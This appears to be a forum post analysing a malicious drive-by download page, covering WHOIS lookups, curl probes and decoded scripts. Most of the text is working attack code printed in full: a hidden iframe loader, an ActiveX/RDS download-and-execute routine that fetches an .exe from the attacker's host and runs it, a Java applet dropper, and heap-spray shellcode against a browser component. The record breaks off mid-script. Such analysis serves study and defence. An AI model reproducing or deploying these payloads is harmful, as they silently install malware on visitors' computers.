a guy got this in a file called BackDoor-CUS!php

<html>
<script language="javascript">
s=unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%6E%6F%77%6E%61%6D%65%73%2E%6F%72%67%2F%69%6D%61%67%65%73%2F%69%6E%2E%70%68%70%3F%61%64%76%3D%33%22%20%57%49%44%54%48%3D%22%30%25%22%20%48%45%49%47%48%54%3D%22%30%25%22%20%4D%41%52%47%49%4E%48%45%49%47%48%54%3D%22%30%22%20%4D%41%52%47%49%4E%57%49%44%54%48%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%61%75%74%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%4E%4F%52%45%53%49%5A%45%3E%3C%2F%69%66%72%61%6D%65%3E%0A");
document.writeln(s);document.close();
</script>
</html> 

Unencoded this reads

<iframe src="http://www.nownames.org/images/in.php?adv=3" WIDTH="0%"
HEIGHT="0%" MARGINHEIGHT="0" MARGINWIDTH="0" SCROLLING="auto"
frameborder="0" NORESIZE> 

************************************************ whois?

NOTICE: Access to .ORG WHOIS information is provided to assist persons in 
determining the contents of a domain name registration record in the Public Interest Registry
registry database. The data in this record is provided by Public Interest Registry
for informational purposes only, and Public Interest Registry does not guarantee its 
accuracy.  This service is intended only for query-based access.  You agree 
that you will use this data only for lawful purposes and that, under no 
circumstances will you use this data to: (a) allow, enable, or otherwise 
support the transmission by e-mail, telephone, or facsimile of mass 
unsolicited, commercial advertising or solicitations to entities other than 
the data recipient's own existing customers; or (b) enable high volume, 
automated, electronic processes that send queries or data to the systems of 
Registry Operator or any ICANN-Accredited Registrar, except as reasonably 
necessary to register domain names or modify existing registrations.  All 
rights reserved. Public Interest Registry reserves the right to modify these terms at any 
time. By submitting this query, you agree to abide by this policy. 

Domain ID:D135312341-LROR
Domain Name:NOWNAMES.ORG
Created On:18-Dec-2006 12:31:23 UTC
Last Updated On:22-Dec-2006 11:30:31 UTC
Expiration Date:18-Dec-2007 12:31:23 UTC
Sponsoring Registrar:OnlineNIC Inc. (R64-LROR)
Status:TRANSFER PROHIBITED
Registrant ID:ONLC-2520425-4
Registrant Name:Victor Kozlov
Registrant Organization:Private person
Registrant Street1:2 Dobson Ave Oakleigh East
Registrant Street2:
Registrant Street3:
Registrant City:Melbourne
Registrant State/Province:Victoria
Registrant Postal Code:3166
Registrant Country:AU
Registrant Phone:+7.4955123456
Registrant Phone Ext.:
Registrant FAX:+7.4955123456
Registrant FAX Ext.:
Registrant Email:datexe@safe-mail.net
Admin ID:ONLC-2520425-1
Admin Name:Victor Kozlov
Admin Organization:Private person
Admin Street1:2 Dobson Ave Oakleigh East
Admin Street2:
Admin Street3:
Admin City:Melbourne
Admin State/Province:Victoria
Admin Postal Code:3166
Admin Country:AU
Admin Phone:+7.4955123456
Admin Phone Ext.:
Admin FAX:+7.4955123456
Admin FAX Ext.:
Admin Email:datexe@safe-mail.net
Tech ID:ONLC-2520425-2
Tech Name:Victor Kozlov
Tech Organization:Private person
Tech Street1:2 Dobson Ave Oakleigh East
Tech Street2:
Tech Street3:
Tech City:Melbourne
Tech State/Province:Victoria
Tech Postal Code:3166
Tech Country:AU
Tech Phone:+7.4955123456
Tech Phone Ext.:
Tech FAX:+7.4955123456
Tech FAX Ext.:
Tech Email:datexe@safe-mail.net
Name Server:NS1.DOMENS.NAME
Name Server:NS2.DOMENS.NAME

Whois Record
IP Information 72.237.24.189
Record Type: 	IP Address
IP Location: 	United States United States - Pennsylvania - Perkasie - Said Inc
Reverse DNS: 	srv.techvipdns.org
Blacklist Status: 	Clear

OrgName:  TelCove, Inc.
OrgID:   TELCO-12
Address:  712 N Main Street
City:    Coudersport
StateProv: PA
PostalCode: 16915
Country:  US

NetRange:  72.236.0.0 - 72.237.255.255
CIDR:    72.236.0.0/15
NetName:  TELCOVE-KMC
NetHandle: NET-72-236-0-0-1
Parent:   NET-72-0-0-0-0
NetType:  Direct Allocation
NameServer: NS1.TELCOVE.NET
NameServer: NS2.TELCOVE.NET
NameServer: NS3.TELCOVE.NET
Comment:
RegDate:  2005-04-27
Updated:  2006-04-11

RAbuseHandle: ABUSE167-ARIN
RAbuseName:  Abuse
RAbusePhone: +1-814-260-2633
RAbuseEmail: Whois Privacy and Spam Prevention by DomainTools.com

OrgAbuseHandle: ABUSE167-ARIN
OrgAbuseName:  Abuse
OrgAbusePhone: +1-814-260-2633
OrgAbuseEmail: Whois Privacy and Spam Prevention by DomainTools.com

OrgTechHandle: DEG3-ARIN
OrgTechName:  Gietler, Danielle Elizabeth
OrgTechPhone: +1-814-260-2766
OrgTechEmail: Whois Privacy and Spam Prevention by DomainTools.com

OrgTechHandle: AMB37-ARIN
OrgTechName:  Barentine, Angela M
OrgTechPhone: +1-814-260-2757
OrgTechEmail: Whois Privacy and Spam Prevention by DomainTools.com

OrgName:  Said, Inc.
OrgID:   SAIDI-1
Address:  21B N 7th Street
City:    Perkasie
StateProv: PA
PostalCode: 18944
Country:  US

NetRange:  72.237.24.0 - 72.237.25.255
CIDR:    72.237.24.0/23
NetName:  TELCOVE-PHLA-SAIDINC
NetHandle: NET-72-237-24-0-1
Parent:   NET-72-236-0-0-1
NetType:  Reassigned
Comment:
RegDate:  2006-09-22
Updated:  2006-09-22

OrgTechHandle: ITADM20-ARIN
OrgTechName:  IT Admin
OrgTechPhone: +1-215-257-3110
OrgTechEmail: Whois Privacy and Spam Prevention by DomainTools.com

************************************************ in.php

    4  curl http://www.nownames.org/images/in.php > in.php.1
    5  curl "http://www.nownames.org/images/in.php?adv=3" > in.php.2
    6  curl "http://www.nownames.org/images/in.php?adv=2" > in.php.3
    7  curl "http://www.nownames.org/images/in.php?adv=1" > in.php.4
   14  curl "http://www.nownames.org/images/in.php?adv=0" > in.php.5
   15  curl "http://www.nownames.org/images/in.php?adv='" > in.php.6
   17  curl "http://www.nownames.org/images/in.php?adv=ASD" > in.php.7
   19  curl "http://www.nownames.org/images/in.php?adv=4" > in.php.8
   20  curl "http://www.nownames.org/images/in.php?adv=5" > in.php.9

note that this changed over the time, probably the guy modified something seeing
queries from fd : )

************************ in.php.1

witout any adv parameter

<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,u,p=0,s=0,w=0,t=Array(63,49,32,9,55,0,28,50,3,2,0,0,0,0,0,0,47,45,22,19,51,1,59,5,6,56,35,31,12,52,16,38,8,60,10,30,40,48,21,33,44,53,4,0,0,0,0,26,0,27,24,23,18,17,57,36,62,37,39,42,15,20,29,43,25,14,41,58,11,13,46,34,61,7,54);for(j=Math.ceil(l/b);j>0;j--){u='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){u+=String.fromCharCode(226^w&255);w>>=8;s-=2}else{s=6}}document.write(u)}}dc("98")</script>

************************ in.php.2

with adv=3

<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,u,p=0,s=0,w=0,t=Array(63,51,27,16,8,41,0,39,19,61,0,0,0,0,0,0,12,57,17,45,26,5,35,23,25,6,49,7,44,4,56,1,50,14,2,52,62,11,59,37,53,34,28,0,0,0,0,60,0,30,24,40,9,18,29,46,47,13,31,33,42,58,38,21,10,15,20,32,55,43,3,54,22,36,48);for(j=Math.ceil(l/b);j>0;j--){u='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){u+=String.fromCharCode(226^w&255);w>>=8;s-=2}else{s=6}}document.write(u)}}dc("Rv")</script>

************************ in.php.3

with adv=2

<SCRIPT language="javascript">
var url="http://www.nownames.org/images/funny.php?adv=2";
</script>

************************ in.php.4

with adv=1

<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,u,p=0,s=0,w=0,t=Array(63,3,7,18,25,4,26,61,58,0,0,0,0,0,0,0,2,23,8,27,24,28,1,53,43,47,55,34,39,12,22,21,14,30,62,50,44,56,6,48,40,59,15,0,0,0,0,42,0,36,33,9,52,57,37,49,19,51,60,46,45,32,41,11,38,10,5,54,13,20,16,17,31,35,29);for(j=Math.ceil(l/b);j>0;j--){u='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){u+=String.fromCharCode(226^w&255);w>>=8;s-=2}else{s=6}}document.write(u)}}dc("@1")</script>

************************ in.php.5

with adv=0 (it doesn't exists and a different template is used)

<SCRIPT language="javascript">
var url="http://www.nownames.org/images/funny.php?adv=0";
</script>

************************ in.php.6

with adv=' (the server use magic quotes)

<SCRIPT language="javascript">
var url="http://www.nownames.org/images/funny.php?adv=\'";
</script>

************************ in.php.7

and we have an xss here : )

<SCRIPT language="javascript">
var url="http://www.nownames.org/images/funny.php?adv=ASD";
</script>

************************ in.php.8

okay only adv 1-3 and NULL give us something

<SCRIPT language="javascript">
var url="http://www.nownames.org/images/funny.php?adv=4";
</script>

************************ base64 of adv=3 (the original url)
 IA0KPGFwcGxldCBhcmNoaXZlPSJjcnRkY2doY24uamFyIiBjb2RlPSJCYWFhYUJhYS5jbGFzcyIgd2lkdGg9MSBoZWlnaHQ9MT4NCjxwYXJhbSBuYW1lPSJ1cmwiIHZhbHVlPSJodHRwOi8vd3d3Lm5vd25hbWVzLm9yZy9pbWFnZXMvZnVubnkucGhwP2Fkdj0zJnNwbD1qYXZhIj48L2FwcGxldD4NCjxTQ1JJUFQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPgp2YXIgdXJsPSJodHRwOi8vd3d3Lm5vd25hbWVzLm9yZy9pbWFnZXMvZnVubnkucGhwP2Fkdj0zIjsKDQp2YXIgYmIxMjgzNjgxMzU2ZmYgPSB1cmwrJyZzcGw9cmRzJzsNCmZ1bmN0aW9uIENyZWF0ZU8obywgbikgew0KICAgICAgICB2YXIgciA9IG51bGw7DQogICAgICAgIA0KICAgICAgICB0cnkgeyBldmFsKCdyID0gby5DcmVhdGVPYmplY3QobiknKSB9Y2F0Y2goZSl7fQ0KICAgICAgICANCiAgICAgICAgaWYgKCEgcikgew0KICAgICAgICAgICAgICAgIHRyeSB7IGV2YWwoJ3IgPSBvLkNyZWF0ZU9iamVjdChuLCAiIiknKSB9Y2F0Y2goZSl7fQ0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICBpZiAoISByKSB7DQogICAgICAgICAgICAgICAgdHJ5IHsgZXZhbCgnciA9IG8uQ3JlYXRlT2JqZWN0KG4sICIiLCAiIiknKSB9Y2F0Y2goZSl7fQ0KICAgICAgICB9DQoNCiAgICAgICAgaWYgKCEgcikgew0KICAgICAgICAgICAgICAgIHRyeSB7IGV2YWwoJ3IgPSBvLkdldE9iamVjdCgiIiwgbiknKSB9Y2F0Y2goZSl7fQ0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICBpZiAoISByKSB7DQogICAgICAgICAgICAgICAgdHJ5IHsgZXZhbCgnciA9IG8uR2V0T2JqZWN0KG4sICIiKScpIH1jYXRjaChlKXt9DQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGlmICghIHIpIHsNCiAgICAgICAgICAgICAgICB0cnkgeyBldmFsKCdyID0gby5HZXRPYmplY3QobiknKSB9Y2F0Y2goZSl7fQ0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICByZXR1cm4ocik7ICAgICAgDQp9DQoNCmZ1bmN0aW9uIEdvKGEpIHsNCiAgICAgICAgdmFyIHMgPSBDcmVhdGVPKGEsICJXU2MiKyJyaXAiKyJ0LlNoIisiZWxsIik7DQogICAgICAgIHZhciBvID0gQ3JlYXRlTyhhLCAiQURPIisiREIuU3RyIisiZWFtIik7DQogICAgICAgIHZhciBlID0gcy5FbnZpcm9ubWVudCgiUHJvY2VzcyIpOw0KICAgICAgICANCiAgICAgICAgdmFyIGJiMTYzOTk4NDEyMmZmID0gbnVsbDsNCiAgICAgICAJdmFyIGJpbiA9IGUuSXRlbSgiVEVNUCIpKyAiXFwiICsgInJmMjA3MTk2NTMxNm1tLmV4ZSI7DQogICAgICAgIHZhciBiYjM1NTk1MjA5N2ZmOyANCiAgICAgICAgDQogICAgICAgIHRyeSB7IGJiMTYzOTk4NDEyMmZmPW5ldyBYTUxIdHRwUmVxdWVzdCgpOyB9DQogICAgICAgIGNhdGNoKGUpIHsNCiAgICAgICAgICAgICAgICB0cnkgeyBiYjE2Mzk5ODQxMjJmZiA9IG5ldyBBY3RpdmVYT2JqZWN0KCJNaWNyIisib3NvZnQuWE1MSCIrIlRUUCIpOyB9DQogICAgICAgICAgICAgICAgY2F0Y2goZSkgew0KICAgICAgICAgICAgICAgICAgICAgICAgYmIxNjM5OTg0MTIyZmYgPSBuZXcgQWN0aXZlWE9iamVjdCgiTVMiKyJYTUwyLlNlcnYiKyJlclhNTEgiKyJUVFAiKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGlmICghIGJiMTYzOTk4NDEyMmZmKSByZXR1cm4oMCk7DQogICAgICAgICAgIA0KICAgICAgICBiYjE2Mzk5ODQxMjJmZi5vcGVuKCJHRVQiLCBiYjEyODM2ODEzNTZmZiwgZmFsc2UpDQogICAgICAgIGJiMTYzOTk4NDEyMmZmLnNlbmQobnVsbCk7DQogICAgICAgIGJiMzU1OTUyMDk3ZmYgPSBiYjE2Mzk5ODQxMjJmZi5yZXNwb25zZUJvZHk7DQogICAgICAgIA0KICAgICAgICBvLlR5cGUgPSAxOw0KICAgICAgICBvLk1vZGUgPSAzOw0KICAgICAgICBvLk9wZW4oKTsNCiAgICAgICAgby5Xcml0ZShiYjM1NTk1MjA5N2ZmKTsNCiAgICAgICAgby5TYXZlVG9GaWxlKGJpbiwgMik7DQogICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgcy5SdW4oYmluLDApOw0KfQ0KDQp2YXIgaSA9IDA7DQp2YXIgYmI3MzAwMjMxMTlmZiA9IG5ldyBBcnJheSgne0JEOTZDNTU2LTY1QTMtMTFEMC05ODNBLTAwQzA0RkMyOUUzNn0nLCd7QkQ5NkM1NTYtNjVBMy0xMUQwLTk4M0EtMDBDMDRGQzI5RTM2fScsJ3tBQjlCQ0VERC1FQzdFLTQ3RTEtOTMyMi1ENEEyMTA2MTcxMTZ9JywnezAwMDZGMDMzLTAwMDAtMDAwMC1DMDAwLTAwMDAwMDAwMDA0Nn0nLCd7MDAwNkYwM0EtMDAwMC0wMDAwLUMwMDAtMDAwMDAwMDAwMDQ2fScsJ3s2ZTMyMDcwYS03NjZkLTRlZTYtODc5Yy1kYzFmYTkxZDJmYzN9JywnezY0MTQ1MTJCLUI5NzgtNDUxRC1BMEQ4LUZDRkRGMzNFODMzQ30nLCd7N0Y1QjdGNjMtRjA2Ri00MzMxLThBMjYtMzM5RTAzQzBBRTNEfScsJ3swNjcyM0UwOS1GNEMyLTQzYzgtODM1OC0wOUZDRDFEQjA3NjZ9JywnezYzOUY3MjVGLTFCMkQtNDgzMS1BOUZELTg3NDg0NzY4MjAxMH0nLCd7QkEwMTg1OTktMURCMy00NGY5LTgzQjQtNDYxNDU0Qzg0QkY4fScsJ3tEMEMwN0Q1Ni03QzY5LTQzRjEtQjRBMC0yNUY1QTExRkFCMTl9Jywne0U4Q0NDRERGLUNBMjgtNDk2Yi1CMDUwLTZDMDdDOTYyNDc2Qn0nLG51bGwpOw0KICAgICAgICANCndoaWxlIChiYjczMDAyMzExOWZmW2ldKSB7DQogICAgICAgICAgICAgdmFyIGEgPSBudWxsOw0KICAgICAgICAgICAgICANCiAgICAgICAgICAgICBpZiAoYmI3MzAwMjMxMTlmZltpXS5zdWJzdHJpbmcoMCwxKSA9PSAneycpIHsNCiAgICAgICAgICAgICAgICAgICAgIGEgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJvYmplY3QiKTsNCiAgICAgICAgICAgICAgICAgICAgICBhLnNldEF0dHJpYnV0ZSgiY2xhc3NpZCIsICJjbHNpZDoiICsgYmI3MzAwMjMxMTlmZltpXS5zdWJzdHJpbmcoMSwgYmI3MzAwMjMxMTlmZltpXS5sZW5ndGggLSAxKSk7DQogICAgICAgICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICAgICAgICAgICB0cnkgeyBhID0gbmV3IEFjdGl2ZVhPYmplY3QoYmI3MzAwMjMxMTlmZltpXSk7IH0gY2F0Y2goZSl7fQ0KICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgDQogICAgICAgICAgICAgIGlmIChhKSB7DQogICAgICAgICAgICAgICAgICAgICAgdHJ5IHsgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YXIgYiA9IENyZWF0ZU8oYSwgIldTYyIrInJpcHQuU2hlIisibGwiKTsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIChiKSB7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR28oYSk7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLy9yZXR1cm4oMCk7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgICB9IGNhdGNoKGUpe30NCiAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICBpKys7DQogfQ0KCgoKCg0KDQp2YXIgYmIxOTc5MTU2MDYxZmYgPSB1cmwrJyZzcGw9ZmknOw0KdmFyIEFmZ3NBUnRnID0gMHgwYzBjMGMwYzsNCnZhciBiYjE2ODg1MDgzMTVmZiA9ICcnOw0KDQpmb3IgKGkgPSAwOyBpIDwgYmIxOTc5MTU2MDYxZmYubGVuZ3RoOyApIA0Kew0KYmIxNjg4NTA4MzE1ZmYgKz0gJyV1JyArICgoaSsxPGJiMTk3OTE1NjA2MWZmLmxlbmd0aCk/YmIxOTc5MTU2MDYxZmYuY2hhckNvZGVBdChpKzEpLnRvU3RyaW5nKDE2KTonMDAnKStiYjE5NzkxNTYwNjFmZi5jaGFyQ29kZUF0KGkpLnRvU3RyaW5nKDE2KTsNCmkgPSBpICsgMjsNCn0JDQoNCiAgICAgICAgcXdlcnR5ID0gdW5lc2NhcGUoIiV1OTA5MCV1OTA5MCV1MGZlYiV1MzM1YiV1NjZjOSV1ODBiOSV1ODAwMSV1ZWYzMyV1ZTI0MyV1ZWJmYSV1ZTgwNSV1ZmZlYyV1ZmZmZiV1OGI3ZiV1ZGY0ZSV1ZWZlZiV1NjRlZiV1ZTNhZiV1OWY2NCV1NDJmMyV1OWY2NCV1NmVlNyV1ZWYwMyV1ZWZlYiV1NjRlZiV1YjkwMyV1NjE4NyV1ZTFhMSV1MDcwMyV1ZWYxMSV1ZWZlZiV1YWE2NiV1YjllYiV1Nzc4NyV1NjUxMSV1MDdlMSV1ZWYxZiV1ZWZlZiV1YWE2NiV1YjllNyV1Y2E4NyV1MTA1ZiV1MDcyZCV1ZWYwZCV1ZWZlZiV1YWE2NiV1YjllMyV1MDA4NyV1MGYyMSV1MDc4ZiV1ZWYzYiV1ZWZlZiV1YWE2NiV1YjlmZiV1MmU4NyV1MGE5NiV1MDc1NyV1ZWYyOSV1ZWZlZiV1YWE2NiV1YWZmYiV1ZDc2ZiV1OWEyYyV1NjYxNSV1ZjdhYSV1ZTgwNiV1ZWZlZSV1YjFlZiV1OWE2NiV1NjRjYiV1ZWJhYSV1ZWU4NSV1NjRiNiV1ZjdiYSV1MDdiOSV1ZWY2NCV1ZWZlZiV1ODdiZiV1ZjVkOSV1OWZjMCV1NzgwNyV1ZWZlZiV1NjZlZiV1ZjNhYSV1MmE2NCV1MmY2YyV1NjZiZiV1Y2ZhYSV1MTA4NyV1ZWZlZiV1YmZlZiV1YWE2NCV1ODVmYiV1YjZlZCV1YmE2NCV1MDdmNyV1ZWY4ZSV1ZWZlZiV1YWFlYyV1MjhjZiV1YjNlZiV1YzE5MSV1Mjg4YSV1ZWJhZiV1OGE5NyV1ZWZlZiV1OWExMCV1NjRjZiV1ZTNhYSV1ZWU4NSV1NjRiNiV1ZjdiYSV1YWYwNyV1ZWZlZiV1ODVlZiV1YjdlOCV1YWFlYyV1ZGNjYiV1YmMzNCV1MTBiYyV1Y2Y5YSV1YmNiZiV1YWE2NCV1ODVmMyV1YjZlYSV1YmE2NCV1MDdmNyV1ZWZjYyV1ZWZlZiV1ZWY4NSV1OWExMCV1NjRjZiV1ZTdhYSV1ZWQ4NSV1NjRiNiV1ZjdiYSV1ZmYwNyV1ZWZlZiV1ODVlZiV1NjQxMCV1ZmZhYSV1ZWU4NSV1NjRiNiV1ZjdiYSV1ZWYwNyV1ZWZlZiV1YWVlZiV1YmRiNCV1MGVlYyV1MGVlYyV1MGVlYyV1MGVlYyV1MDM2YyV1YjVlYiV1NjRiYyV1MGQzNSV1YmQxOCV1MGYxMCV1NjRiYSV1NjQwMyV1ZTc5MiV1YjI2NCV1YjllMyV1OWM2NCV1NjRkMyV1ZjE5YiV1ZWM5NyV1YjkxYyV1OTk2NCV1ZWNjZiV1ZGMxYyV1YTYyNiV1NDJhZSV1MmNlYyV1ZGNiOSV1ZTAxOSV1ZmY1MSV1MWRkNSV1ZTc5YiV1MjEyZSV1ZWNlMiV1YWYxZCV1MWUwNCV1MTFkNCV1OWFiMSV1YjUwYSV1MDQ2NCV1YjU2NCV1ZWNjYiV1ODkzMiV1ZTM2NCV1NjRhNCV1ZjNiNSV1MzJlYyV1ZWI2NCV1ZWM2NCV1YjEyYSV1MmRiMiV1ZWZlNyV1MWIwNyV1MTAxMSV1YmExMCV1YTNiZCV1YTBhMiV1ZWZhMSIpOw0KCWVydHkgPSB1bmVzY2FwZShiYjE2ODg1MDgzMTVmZik7DQoJdmFyIGJiMTg1MjAxMDgzOWZmID0gcXdlcnR5K2VydHk7DQoJdmFyIHJmMTAzMzczMTY0NG1taXplID0gMHg0MDAwMDA7DQoJdmFyIGRlc3J0ZmdrID0gYmIxODUyMDEwODM5ZmYubGVuZ3RoICogMjsNCgl2YXIgYmI3NjQ3NzkxMDRmZlNpemUgPSByZjEwMzM3MzE2NDRtbWl6ZSAtIChkZXNydGZnaysweDM4KTsNCgl2YXIgYmI3NjQ3NzkxMDRmZiA9IHVuZXNjYXBlKCIldTBjMGMldTBjMGMiKTsNCgliYjc2NDc3OTEwNGZmID0gZ2V0YmI3NjQ3NzkxMDRmZihiYjc2NDc3OTEwNGZmLGJiNzY0Nzc5MTA0ZmZTaXplKTsNCglyZjEwMzM3MzE2NDRtbSA9IChBZmdzQVJ0ZyAtIDB4NDAwMDAwKS9yZjEwMzM3MzE2NDRtbWl6ZTsNCgltZW1vcnkgPSBuZXcgQXJyYXkoKTsNCglmb3IgKGk9MDtpPHJmMTAzMzczMTY0NG1tO2krKykNCgl7DQoJCW1lbW9yeVtpXSA9IGJiNzY0Nzc5MTA0ZmYgKyBiYjE4NTIwMTA4MzlmZjsNCgl9DQoJdmFyIGdvdiA9ICcnOw0KCXZhciBzID0gZ292Ow0KCXMgKz0gMHg3ZmZmZmZmZTsNCiAgIAlmb3IgKCBpID0gMCA7IGkgPCAyNTYgOyBpKyspIA0KCXsNCgkJdHJ5eyANCgkJCXZhciBnID0gbmV3IEFjdGl2ZVhPYmplY3QoJ1dlYlZpJysnZXdGb2wnK2dvdisnZGVySScrZ292Kydjb24uV2ViVmllJytnb3YrJ3dGb2wnKydkZXJJJysnY29uLjEnKTsNCgkJCWcuc2V0U2xpY2UocywgQWZnc0FSdGcsIEFmZ3NBUnRnLCBBZmdzQVJ0ZyApOyANCgkJfWNhdGNoKGUpe30NCgl9DQoNCglmdW5jdGlvbiBnZXRiYjc2NDc3OTEwNGZmKGJiNzY0Nzc5MTA0ZmYsIGJiNzY0Nzc5MTA0ZmZTaXplKQ0KCXsNCgkJd2hpbGUgKGJiNzY0Nzc5MTA0ZmYubGVuZ3RoKjI8YmI3NjQ3NzkxMDRmZlNpemUpDQoJCXsNCgkJCWJiNzY0Nzc5MTA0ZmYgKz0gYmI3NjQ3NzkxMDRmZjsNCgkJfQ0KCQliYjc2NDc3OTEwNGZmID0gYmI3NjQ3NzkxMDRmZi5zdWJzdHJpbmcoMCxiYjc2NDc3OTEwNGZmU2l6ZS8yKTsNCgkJcmV0dXJuIGJiNzY0Nzc5MTA0ZmY7DQoJfQ0KPC9zY3JpcHQ+ 

************************ source of adv=3

<applet archive="crtdcghcn.jar" code="BaaaaBaa.class" width=1 height=1>
<param name="url" value="http://www.nownames.org/images/funny.php?adv=3&spl=java"></applet>
<SCRIPT language="javascript">
var url="http://www.nownames.org/images/funny.php?adv=3";

var bb1283681356ff = url+'&spl=rds';
function CreateO(o, n) {
        var r = null;
        
        try { eval('r = o.CreateObject(n)') }catch(e){}
        
        if (! r) {
                try { eval('r = o.CreateObject(n, "")') }catch(e){}
        }
        
        if (! r) {
                try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
        }

        if (! r) {
                try { eval('r = o.GetObject("", n)') }catch(e){}
        }
        
        if (! r) {
                try { eval('r = o.GetObject(n, "")') }catch(e){}
        }
        
        if (! r) {
                try { eval('r = o.GetObject(n)') }catch(e){}
        }
        
        return(r);      
}

function Go(a) {
        var s = CreateO(a, "WSc"+"rip"+"t.Sh"+"ell"); 
        var o = CreateO(a, "ADO"+"DB.Str"+"eam");
        var e = s.Environment("Process");
        
        var bb1639984122ff = null;
       	var bin = e.Item("TEMP")+ "\\" + "rf2071965316mm.exe";
        var bb355952097ff; 
        
        try { bb1639984122ff=new XMLHttpRequest(); }
        catch(e) {
                try { bb1639984122ff = new ActiveXObject("Micr"+"osoft.XMLH"+"TTP"); }
                catch(e) {
                        bb1639984122ff = new ActiveXObject("MS"+"XML2.Serv"+"erXMLH"+"TTP");
                }
        }
        
        if (! bb1639984122ff) return(0);
           
        bb1639984122ff.open("GET", bb1283681356ff, false)
        bb1639984122ff.send(null);
        bb355952097ff = bb1639984122ff.responseBody;
        
        o.Type = 1;
        o.Mode = 3;
        o.Open();
        o.Write(bb355952097ff);
        o.SaveToFile(bin, 2);
                     
        s.Run(bin,0);
}

var i = 0;
var bb730023119ff = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);
        
while (bb730023119ff[i]) {
             var a = null;
              
             if (bb730023119ff[i].substring(0,1) == '{') {
                     a = document.createElement("object");
                      a.setAttribute("classid", "clsid:" + bb730023119ff[i].substring(1, bb730023119ff[i].length - 1));
              } else {
                     try { a = new ActiveXObject(bb730023119ff[i]); } catch(e){}
             }
              
              if (a) {
                      try {           
                             var b = CreateO(a, "WSc"+"ript.She"+"ll");
                              if (b) {
                                     Go(a);
                                     //return(0);
                              }
                     } catch(e){}
               }
             i++;
 }






var bb1979156061ff = url+'&spl=fi';
var AfgsARtg = 0x0c0c0c0c;
var bb1688508315ff = '';

for (i = 0; i < bb1979156061ff.length; ) 
{
bb1688508315ff += '%u' + ((i+1<bb1979156061ff.length)?bb1979156061ff.charCodeAt(i+1).toString(16):'00')+bb1979156061ff.charCodeAt(i).toString(16);
i = i + 2;
}	

        qwerty = unescape("%u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1");
	erty = unescape(bb1688508315ff);
	var bb1852010839ff = qwerty+erty;
	var rf1033731644mmize = 0x400000;
